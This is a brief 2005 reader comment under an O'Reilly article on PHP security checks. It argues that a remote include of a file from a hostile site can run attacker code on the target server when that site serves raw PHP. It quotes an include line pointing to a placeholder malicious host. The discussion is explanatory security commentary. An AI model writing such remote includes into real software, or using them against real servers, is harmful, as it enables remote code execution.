ONJava.com -- The Independent Source for Enterprise Java
oreilly.comSafari Books Online.Conferences.

advertisement

AddThis Social Bookmark Button
Article:
  Ten Security Checks for PHP, Part 1
Subject:   Not the kind of article i would expect from o'reilly!
Date:   2005-02-06 03:49:12
From:   bbbbbbbbbbbbbb
Response to: Not the kind of article i would expect from o'reilly!

"First, include("http://www.some-BAD-site.com/whatever.php") can't really do any harm, since it is executed on the some-bad-site.com, and not on the targeted machine."


Obviously, you assume that www.some-BAD-site.com is running php.


Then, what if it doesn't,eh? ;)


1 to 1 of 1
1 to 1 of 1